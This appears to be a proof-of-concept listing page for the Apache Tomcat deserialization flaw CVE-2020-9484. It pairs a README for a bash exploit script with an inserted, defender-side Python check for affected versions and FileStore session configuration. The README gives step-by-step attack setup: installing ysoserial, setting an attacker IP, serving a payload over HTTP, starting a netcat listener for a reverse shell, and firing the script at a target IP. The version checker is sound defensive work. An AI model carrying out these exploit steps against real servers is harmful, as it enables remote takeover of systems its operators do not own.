PoC details: 2c0a1bdeee31bb4d1735cc04b6a3602cf0803897

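Source
Related vulnerability
Title: Apache Tomcat code issue vulnerability (CVE-2020-9484)
Description: Apache Tomcat is a lightweight web application server from the Apache Software Foundation (USA). It implements support for Servlet and JavaServer Pages (JSP). A code issue vulnerability exists in Apache Tomcat. An attacker can exploit it to execute code by, among other methods, controlling the contents and name of a file on the server. The following products and versions are affected: Apache Tomcat 10.0.0-M1 through 10.0.0-M4, 9.0.0.0.M1 up to but not including 9.0.43, 8.5.0 up to but not including 8.5.63, and 7.0.0 up to but not including 7.0.108.
Introduction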
# Remote Code Execution Exploit in Apache Tomcat 9.0.27

Apache Tomcat 9.0.27 is vulnerable to Remote Code Execution, tracked as CVE-2020-9484. Other versions may be affected as well. Tested on Kali 2020.4 and JDK 8. This bash script is a simple proof-of-concept. For educational purposes only.

## Description

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insecure input validation when processing serialized data in uploaded file names. A remote attacker can pass a specially crafted file name to the application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system, but it requires that the server is configured to use PersistentManager with a FileStore and that the attacker knows the relative file path from the storage location.
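A defender-side check for the preconditions described above, added here as an example and not part of the original README or the PoC script: it tests a Tomcat version against the ranges listed on this page and looks for a `PersistentManager` backed by a `FileStore` in a context file. The function names and the sample `context.xml` are constructed for illustration; the class and attribute names are Tomcat's own.

```python
import re
import xml.etree.ElementTree as ET

# First fixed patch level per branch, from the version ranges listed on this page.
FIXED_PATCH = {(9, 0): 43, (8, 5): 63, (7, 0): 108}

def version_affected(version):
    """True if a Tomcat version string falls inside the ranges listed on this page."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:[.-]M(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {version!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    milestone = int(m.group(4)) if m.group(4) else None
    if (major, minor) == (10, 0):
        # Only milestones 10.0.0-M1 through 10.0.0-M4 are listed for this branch.
        return patch == 0 and milestone is not None and 1 <= milestone <= 4
    fixed = FIXED_PATCH.get((major, minor))
    return fixed is not None and patch < fixed

def filestore_managers(context_xml):
    """List every <Manager> that persists sessions to disk through a FileStore."""
    findings = []
    for manager in ET.fromstring(context_xml).iter("Manager"):
        if not manager.get("className", "").endswith("PersistentManager"):
            continue
        for store in manager.iter("Store"):
            if store.get("className", "").endswith("FileStore"):
                findings.append({
                    "directory": store.get("directory"),
                    # None means no class filter restricts session deserialization.
                    "class_filter": manager.get("sessionAttributeValueClassNameFilter"),
                })
    return findings

def audit(version, context_xml):
    """Return (exposed, stores): exposed needs an affected version and a FileStore."""
    stores = filestore_managers(context_xml)
    return version_affected(version) and bool(stores), stores

# Constructed sample configuration, not taken from any real deployment.
SAMPLE_CONTEXT = """<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore" directory="sessions"/>
  </Manager>
</Context>"""

if __name__ == "__main__":
    print(audit("9.0.27", SAMPLE_CONTEXT))
```
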

## Requirements

In order to use the script, [ysoserial](https://github.com/frohoff/ysoserial) is needed. To install it:

`cd /opt && git clone https://github.com/frohoff/ysoserial`

`cd /opt/ysoserial && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial-master.jar`

If you have ysoserial already installed, make sure to rename it to "ysoserial-master.jar".

## Installation

To install the script, type:

`cd /opt && git clone https://github.com/PenTestical/CVE-2020-9484 && cd CVE-2020-9484/ && chmod +x CVE-2020-9484.sh`

## Help menu

To open the help menu, type:

`./CVE-2020-9484.sh --help`

or

`./CVE-2020-9484.sh -h`


## How to use it

First, open the script and place your own IP address at line 14:

`remote_ip="10.10.16.180" 	# change this`

This script creates the files "payload.sh", "downloadPayload.session", "chmodPayload.session" and "executePayload.session" in your current directory. In order to use the exploit, you need to start a simple listener at port 80. For example, usage with Python3 (start it in the same folder where you run the script):

`sudo python3 -m http.server 80`

Also, make sure to start a netcat listener at port 4444:

`nc -nvlp 4444`

Now run the script with the IP address of the target system you want to attack:

`./CVE-2020-9484.sh target-ip`

## Troubleshooting

If it does not work, make sure to use JDK 8. To test which version you use, type:

`java -version`

The script might not work on JDK version 12 or higher. Read more about it [here](https://github.com/frohoff/ysoserial/issues/107).
File snapshot

[4.0K] /data/pocs/2c0a1bdeee31bb4d1735cc04b6a3602cf0803897
├── [4.9K] CVE-2020-9484.sh
├── [ 272] install.txt
├── [ 34K] LICENSE
└── [2.4K] README.md

0 directories, 4 files